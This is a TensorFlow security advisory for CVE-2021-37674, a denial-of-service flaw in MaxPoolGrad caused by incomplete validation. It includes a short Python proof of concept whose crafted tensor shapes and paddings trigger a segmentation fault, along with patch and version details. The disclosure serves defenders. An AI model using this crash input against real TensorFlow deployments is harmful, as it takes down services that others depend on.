## TFSA-2021-148: Incomplete validation in `MaxPoolGrad`

### CVE Number
CVE-2021-37674

### Impact
An attacker can trigger a denial of service via a segmentation fault in
`tf.raw_ops.MaxPoolGrad` caused by missing validation:

```python
import tensorflow as tf

tf.raw_ops.MaxPoolGrad(
  orig_input = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32),
  orig_output = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32),
  grad = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32),
  ksize = [1, 16, 16, 1],
  strides = [1, 16, 18, 1],
  padding = "EXPLICIT",
  explicit_paddings = [0, 0, 14, 3, 15, 5, 0, 0])
```

The
[implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/maxpooling_op.cc)
misses some validation for the `orig_input` and `orig_output` tensors.

The fixes for
[CVE-2021-29579](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-068.md)
were incomplete.

### Patches
We have patched the issue in GitHub commit
[136b51f10903e044308cf77117c0ed9871350475](https://github.com/tensorflow/tensorflow/commit/136b51f10903e044308cf77117c0ed9871350475).

The fix will be included in TensorFlow 2.6.0. We will also cherrypick this
commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are
also affected and still in supported range.

### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.

### Attribution
This vulnerability has been reported by Yakun Zhang of Baidu Security.
